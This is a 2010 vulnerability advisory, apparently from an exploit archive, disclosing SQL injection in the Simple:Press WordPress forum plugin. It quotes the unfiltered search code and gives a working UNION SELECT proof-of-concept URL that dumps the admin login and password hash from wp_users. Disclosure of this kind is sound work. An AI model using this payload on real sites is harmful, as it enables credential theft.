Simple:Press Wordpress Plugin SQL Injection Vulnerability
Posted on 04 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Simple:Press Wordpress Plugin SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= Simple:Press Wordpress Plugin SQL Injection Vulnerability ========================================================= # Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability # Author: ADEO Security # Published: 03/07/2010 # Version: v4.3.0 (Possible all versions) # Vendor: http://simple-press.com # Download: http://simple-press.com/download-manager.php?id=228 # Description: "Simple:Press – the feature rich, completely integrated and fully scaleable forum plugin for WordPress. Highly customisable, Simple:Press packs the features of a standalone forum into a plugin – seamlessly turning your WordPress site into a community." # Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs - Mail: security[AT]adeo.com.tr - Web: http://security.adeo.com.tr # Vulnerability: In the search field, search values not filtered and inserted into sql queries without using any quotes/single quotes and Simple:Press execute this sql queries. sf-header-forum.php ---[snip]--- 385 # Add Search Vars 386 if(isset($_GET['search'])) 387 { 388 if($_GET['search'] != '') $sfvars['searchpage'] = sf_esc_int($_GET['search']); 389 if(isset($_GET['value']) ? $sfvars['searchvalue'] = stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] = ''); 390 if(isset($_GET['type']) ? $sfvars['searchtype'] = sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1); 400 if(isset($_GET['include']) ? $sfvars['searchinclude'] = sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1); 401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1; 402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1; 403 } else { ---[snip]--- At the line 389, HTTP GET Request "value" defined as global variable $sfvars['searchvalue'] with filtering functions that stripslashes() and urldecode() but they can't secure it because in the sf-database.php file the global variable $sfvar['searchvalue'] inserted into sql query without any quotes/single quotes. sf-database.php ---[snip]--- ... 401 $searchvalue=urldecode($sfvars['searchvalue']); ... 404 if($sfvars['searchtype'] == 6) ... 409 $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." "; 410 411 } elseif($sfvars['searchtype'] == 8) ... 414 $userid = $sfvars['searchvalue']; 415 $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT "; 416 $MATCH = ""; 417 $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." "; 418 419 } elseif($sfvars['searchtype'] == 9) ... 422 $userid = $sfvars['searchvalue']; ... 425 $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." "; ... ---[snip]--- Its successfully exploitable with search types 6,8,9. Please see # PoC section. # PoC: Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2 Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo. (0 Matches Found) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
